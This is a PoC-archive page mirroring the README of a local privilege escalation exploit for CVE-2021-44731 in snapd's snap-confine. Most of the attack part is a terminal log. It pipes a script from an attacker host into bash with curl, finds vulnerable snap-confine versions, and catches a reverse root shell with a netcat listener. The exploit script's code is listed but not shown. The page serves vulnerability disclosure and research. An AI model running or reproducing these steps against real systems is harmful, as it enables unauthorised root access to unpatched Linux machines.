Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-44731 PoC — snapd could be made to escalate privileges and run programs as administrator

Source
https://github.com/deeexcee-io/CVE-2021-44731-snap-confine-SUID
Associated Vulnerability
Title:snapd could be made to escalate privileges and run programs as administrator (CVE-2021-44731)
Description:A race condition existed in the snapd 2.54.2 snap-confine binary when preparing a private mount namespace for a snap. This could allow a local attacker to gain root privileges by bind-mounting their own contents inside the snap's private mount namespace and causing snap-confine to execute arbitrary code and hence gain privilege escalation. Fixed in snapd versions 2.54.3+18.04, 2.54.3+20.04 and 2.54.3+21.10.1
Description
Local Privilege Escalation Exploit for CVE-2021-44731
Readme
# CVE-2021-44731-snap-confine-SUID
Local Privilege Escalation Exploit for CVE-2021-44731, snap-confine 2.54.2 and lower

All credit to Qualys for finding this and providing a detailed exploit. 

https://www.qualys.com/2022/02/17/cve-2021-44731/oh-snap-more-lemmings.txt

Quick and Dirty snap-confine LPE. Will search for vulnerable version of snap-confine, if found will then exploit.

Returns a root shell, catch with netcat

```c
$id
uid=1001(vulnchain) gid=1001(vulnchain) groups=1001(vulnchain)
$ curl http://10.8.0.134/snap_confine_LPE.sh | bash
curl http://10.8.0.134/snap_confine_LPE.sh | bash
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  2073  100  2073    0     0  28397      0 --:--:-- --:--:-- --:--:-- 28013
Non-vulnerable version found: 2.54.3
Vulnerable version found: 2.44.3 at /usr/lib/snapd/snap-confine
Vulnerable version found: 2.44.3 at /home/vulnchain/snap-confine
Performing actions with a vulnerable version...
Chosen vulnerable version: 2.44.3
```

## Root Shell
```c
┌──(root㉿kali)-[~]
└─# nc -lvnp 4447    
listening on [any] 4447 ...
connect to [10.8.0.134] from (UNKNOWN) [10.10.111.136] 56050
bash: cannot set terminal process group (609): Inappropriate ioctl for device
bash: no job control in this shell
root@ip-10-10-10-14:/# id
id
uid=0(root) gid=0(root) groups=0(root),1001(vulnchain)
root@ip-10-10-10-14:/# 
```
File Snapshot

 [4.0K]  /data/pocs/d2aab03ac9470db3b66dbb0ceb4b37caed84c6f0
├── [1.4K]  README.md
└── [1.9K]  snap_confine_LPE.sh

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →